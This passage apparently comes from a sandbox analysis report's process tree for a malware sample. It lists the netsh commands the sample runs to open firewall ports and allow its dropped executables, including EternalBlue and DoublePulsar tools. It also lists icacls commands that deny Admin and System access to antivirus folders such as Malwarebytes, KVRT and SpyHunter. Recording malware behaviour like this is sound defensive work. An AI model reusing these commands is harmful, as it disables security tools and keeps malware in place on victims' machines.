                                                                                                                                    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                    3⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    PID:2008
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                  2⤵
                                                                                                                                    PID:2916
                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                      3⤵
                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                      PID:3000
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                    2⤵
                                                                                                                                      PID:1704
                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                        3⤵
                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                        PID:2040
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                      2⤵
                                                                                                                                        PID:2920
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                          3⤵
                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                          PID:1656
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                        2⤵
                                                                                                                                          PID:2200
                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                            3⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            PID:2000
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                          2⤵
                                                                                                                                            PID:2568
                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                              netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                              3⤵
                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                              PID:1444
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                            2⤵
                                                                                                                                              PID:2860
                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                                3⤵
                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                PID:1028
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                              2⤵
                                                                                                                                                PID:2376
                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                  netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:1060
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                2⤵
                                                                                                                                                  PID:2704
                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                    PID:2296
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2092
                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                      PID:1596
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2328
                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                        PID:2016
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1328
                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                          netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                          PID:1484
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                        2⤵
                                                                                                                                                          PID:656
                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                            PID:1160
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1144
                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                              netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                              PID:2460
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1952
                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                PID:3004
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1868
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:1540
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3008
                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                    netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    PID:844
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2264
                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                                      PID:2820
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2052
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:1628
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1648
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:376
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2840
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:1832
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2204
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:2692
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2608
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:2572
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2564
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:2720
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2148
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:2788
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2636
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:2032
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2892
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:2752
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:1680
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:2000
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:2492
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:1928
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2536
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:2036
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2876
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:1240
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2436
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:1508
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2744
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:1880
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:868
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:2188
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:328
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:496
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3060
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:1596
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:2092
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:1492
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:784
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:2328
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1500
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:576
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1836
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:296
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:760
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:712
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2192
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:656
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:2088
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:448
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:1932
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2600
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:1008
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3044
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:624
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:944
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:2116
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2996
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:1868
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:704
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:1512
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1972
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                      PID:1648
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:1088
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:2204
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2664
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                          PID:1128
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:2484
